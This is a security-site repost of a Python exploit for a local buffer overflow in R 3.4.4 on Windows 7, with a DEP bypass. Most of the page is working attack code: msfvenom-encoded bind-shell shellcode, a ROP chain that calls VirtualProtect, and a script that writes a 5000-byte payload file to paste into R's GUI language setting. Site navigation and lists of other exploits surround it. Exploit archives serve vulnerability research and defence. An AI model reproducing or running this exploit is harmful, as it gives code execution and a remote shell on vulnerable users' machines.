首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
R 3.4.4 - Local Buffer Overflow (DEP Bypass)
来源:vfocus.net 作者:Jawad 发布时间:2018-05-22  
# Exploit Title: R v3.4.4 - Local Buffer Overflow (DEP Bypass)
# Exploit Author: Hashim Jawad
# Exploit Date: 2018-05-21
# Vendor Homepage: https://www.r-project.org/
# Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe
# Tested on OS: Microsoft Windows 7 Enterprise - SP1 (x86)
# Steps to reproduce: under GUI preferences, paste payload.txt contents into 'Language for menus and messages'
 
# Credit to bzyo for finding the bug (44516)
 
#!/usr/bin/python
 
import struct
 
#root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "\x00\x0a\x0d\x0e" -f python -v shellcode
#Payload size: 718 bytes
shellcode =  ""
shellcode += "\x89\xe0\xdb\xd2\xd9\x70\xf4\x5b\x53\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x69\x6c\x59\x78\x6c\x42\x77\x70\x33\x30\x37\x70"
shellcode += "\x31\x70\x6b\x39\x6a\x45\x65\x61\x39\x50\x72\x44"
shellcode += "\x6e\x6b\x30\x50\x56\x50\x4e\x6b\x62\x72\x56\x6c"
shellcode += "\x6c\x4b\x31\x42\x34\x54\x4c\x4b\x62\x52\x64\x68"
shellcode += "\x56\x6f\x68\x37\x70\x4a\x61\x36\x55\x61\x79\x6f"
shellcode += "\x6e\x4c\x75\x6c\x73\x51\x51\x6c\x67\x72\x46\x4c"
shellcode += "\x57\x50\x4b\x71\x5a\x6f\x36\x6d\x76\x61\x6b\x77"
shellcode += "\x7a\x42\x39\x62\x76\x32\x73\x67\x6e\x6b\x36\x32"
shellcode += "\x72\x30\x4e\x6b\x73\x7a\x55\x6c\x4e\x6b\x62\x6c"
shellcode += "\x42\x31\x72\x58\x38\x63\x51\x58\x35\x51\x6b\x61"
shellcode += "\x52\x71\x4e\x6b\x72\x79\x31\x30\x57\x71\x78\x53"
shellcode += "\x6c\x4b\x50\x49\x64\x58\x6b\x53\x77\x4a\x70\x49"
shellcode += "\x6e\x6b\x37\x44\x4e\x6b\x67\x71\x4b\x66\x45\x61"
shellcode += "\x69\x6f\x6c\x6c\x49\x51\x6a\x6f\x46\x6d\x57\x71"
shellcode += "\x5a\x67\x56\x58\x39\x70\x42\x55\x4b\x46\x74\x43"
shellcode += "\x53\x4d\x59\x68\x35\x6b\x73\x4d\x47\x54\x64\x35"
shellcode += "\x5a\x44\x36\x38\x6c\x4b\x56\x38\x57\x54\x76\x61"
shellcode += "\x38\x53\x43\x56\x4c\x4b\x64\x4c\x30\x4b\x6c\x4b"
shellcode += "\x33\x68\x35\x4c\x57\x71\x59\x43\x6c\x4b\x36\x64"
shellcode += "\x6c\x4b\x46\x61\x4e\x30\x6b\x39\x63\x74\x47\x54"
shellcode += "\x55\x74\x31\x4b\x43\x6b\x50\x61\x71\x49\x52\x7a"
shellcode += "\x62\x71\x6b\x4f\x6b\x50\x61\x4f\x51\x4f\x32\x7a"
shellcode += "\x6c\x4b\x66\x72\x5a\x4b\x4c\x4d\x71\x4d\x50\x68"
shellcode += "\x76\x53\x45\x62\x65\x50\x75\x50\x31\x78\x73\x47"
shellcode += "\x71\x63\x74\x72\x31\x4f\x62\x74\x75\x38\x50\x4c"
shellcode += "\x70\x77\x55\x76\x36\x67\x49\x6f\x6b\x65\x6d\x68"
shellcode += "\x7a\x30\x73\x31\x55\x50\x65\x50\x36\x49\x78\x44"
shellcode += "\x33\x64\x62\x70\x65\x38\x65\x79\x6d\x50\x30\x6b"
shellcode += "\x43\x30\x39\x6f\x39\x45\x31\x7a\x56\x68\x70\x59"
shellcode += "\x70\x50\x69\x72\x59\x6d\x37\x30\x70\x50\x71\x50"
shellcode += "\x50\x50\x33\x58\x39\x7a\x46\x6f\x79\x4f\x6d\x30"
shellcode += "\x59\x6f\x69\x45\x7a\x37\x75\x38\x65\x52\x43\x30"
shellcode += "\x37\x61\x63\x6c\x4f\x79\x5a\x46\x31\x7a\x34\x50"
shellcode += "\x30\x56\x31\x47\x45\x38\x39\x52\x79\x4b\x66\x57"
shellcode += "\x42\x47\x59\x6f\x5a\x75\x50\x57\x51\x78\x6c\x77"
shellcode += "\x48\x69\x54\x78\x69\x6f\x6b\x4f\x59\x45\x72\x77"
shellcode += "\x75\x38\x33\x44\x7a\x4c\x75\x6b\x39\x71\x49\x6f"
shellcode += "\x78\x55\x71\x47\x6c\x57\x75\x38\x70\x75\x70\x6e"
shellcode += "\x42\x6d\x35\x31\x79\x6f\x38\x55\x72\x48\x70\x63"
shellcode += "\x42\x4d\x71\x74\x37\x70\x4f\x79\x79\x73\x71\x47"
shellcode += "\x70\x57\x71\x47\x74\x71\x78\x76\x53\x5a\x42\x32"
shellcode += "\x62\x79\x52\x76\x6b\x52\x59\x6d\x35\x36\x79\x57"
shellcode += "\x52\x64\x35\x74\x57\x4c\x37\x71\x43\x31\x4e\x6d"
shellcode += "\x50\x44\x36\x44\x56\x70\x59\x56\x47\x70\x42\x64"
shellcode += "\x46\x34\x70\x50\x36\x36\x50\x56\x50\x56\x71\x56"
shellcode += "\x42\x76\x30\x4e\x73\x66\x76\x36\x66\x33\x76\x36"
shellcode += "\x32\x48\x42\x59\x68\x4c\x55\x6f\x6d\x56\x49\x6f"
shellcode += "\x6b\x65\x4b\x39\x59\x70\x72\x6e\x70\x56\x51\x56"
shellcode += "\x4b\x4f\x34\x70\x51\x78\x34\x48\x4e\x67\x37\x6d"
shellcode += "\x51\x70\x59\x6f\x38\x55\x6d\x6b\x6c\x30\x48\x35"
shellcode += "\x69\x32\x72\x76\x62\x48\x4c\x66\x5a\x35\x4f\x4d"
shellcode += "\x4d\x4d\x69\x6f\x4a\x75\x65\x6c\x67\x76\x73\x4c"
shellcode += "\x47\x7a\x4f\x70\x59\x6b\x4b\x50\x70\x75\x57\x75"
shellcode += "\x6f\x4b\x53\x77\x55\x43\x64\x32\x52\x4f\x51\x7a"
shellcode += "\x53\x30\x46\x33\x4b\x4f\x4b\x65\x41\x41"
 
'''
Output generated by mona.py v2.0, rev 582 - Immunity Debugger
--------------------------------------------
Register setup for VirtualProtect() :
--------------------------------------------
 EAX = NOP (0x90909090)
 ECX = lpOldProtect (ptr to W address)
 EDX = NewProtect (0x40)
 EBX = dwSize
 ESP = lPAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualProtect()
 EDI = ROP NOP (RETN)
--------------------------------------------
'''
 
rop  = struct.pack('<L', 0x6cacc7e2)      # POP EAX # RETN                    [R.dll]
rop += struct.pack('<L', 0x643cb170)      # ptr to &VirtualProtect()          [IAT Riconv.dll]
rop += struct.pack('<L', 0x6e7d5435)      # MOV EAX,DWORD PTR DS:[EAX] # RETN [utils.dll]
rop += struct.pack('<L', 0x6ca347fa)      # XCHG EAX,ESI # RETN               [R.dll]
rop += struct.pack('<L', 0x6cb7429a)      # POP EBP # RETN                    [R.dll]
rop += struct.pack('<L', 0x6ca2a9bd)      # & jmp esp                         [R.dll]
rop += struct.pack('<L', 0x64c45db2)      # POP EAX # RETN                    [methods.dll]
rop += struct.pack('<L', 0xfffffaff)      # value to negate, will become 0x00000501
rop += struct.pack('<L', 0x643c361a)      # NEG EAX # RETN                    [Riconv.dll]
rop += struct.pack('<L', 0x6ca33b8a)      # XCHG EAX,EBX # RETN               [R.dll]
rop += struct.pack('<L', 0x6cbef3e4)      # POP EAX # RETN                    [R.dll]
rop += struct.pack('<L', 0xffffffc0)      # Value to negate, will become 0x00000040
rop += struct.pack('<L', 0x6ff3a39a)      # NEG EAX # RETN                    [grDevices.dll]
rop += struct.pack('<L', 0x6ca558be)      # XCHG EAX,EDX # RETN               [R.dll]
rop += struct.pack('<L', 0x6cbe90a8)      # POP ECX # RETN                    [R.dll]
rop += struct.pack('<L', 0x6ff863c1)      # &Writable location                [grDevices.dll]
rop += struct.pack('<L', 0x6cbe097f)      # POP EDI # RETN                    [R.dll]
rop += struct.pack('<L', 0x6375fe5c)      # RETN (ROP NOP)                    [Rgraphapp.dll]
rop += struct.pack('<L', 0x6c998f58)      # POP EAX # RETN                    [R.dll]
rop += struct.pack('<L', 0x90909090)      # nop
rop += struct.pack('<L', 0x6fedfa6c)      # PUSHAD # RETN                     [grDevices.dll]
 
buffer  = '\x41' * 292                    # filler to EIP
buffer += struct.pack('<L', 0x6fef93c6)   # POP ESI # RETN                    [grDevices.dll]
buffer += '\x41' * 4                      # compensate for pop esi
buffer += rop
buffer += '\x90' * 50
buffer += shellcode
buffer += '\x90' * (5000-292-4-4-len(rop)-50-len(shellcode))
 
try:
    f=open('payload.txt','w')
    print '[+] Creating %s bytes evil payload..' %len(buffer)
    f.write(buffer)
    f.close()
    print '[+] File created!'
except Exception as e:
    print e
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Linux 2.6.30 < 2.6.36-rc8 - Re
·Adobe Experience Manager (AEM)
·GitBucket 4.23.1 - Remote Code
·Easy MPEG to DVD Burner 1.7.11
·Microsoft Edge Chakra JIT - Bo
·DynoRoot DHCP - Client Command
·Prime95 29.4b8 - Stack Buffer
·HPE iMC 7.3 - Remote Code Exec
·AF_PACKET packet_set_ring Priv
·Apache Struts 2 - Struts 1 Plu
·Jenkins CLI - HTTP Java Deseri
·Linux < 4.16.9 / < 4.14.41 - 4
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved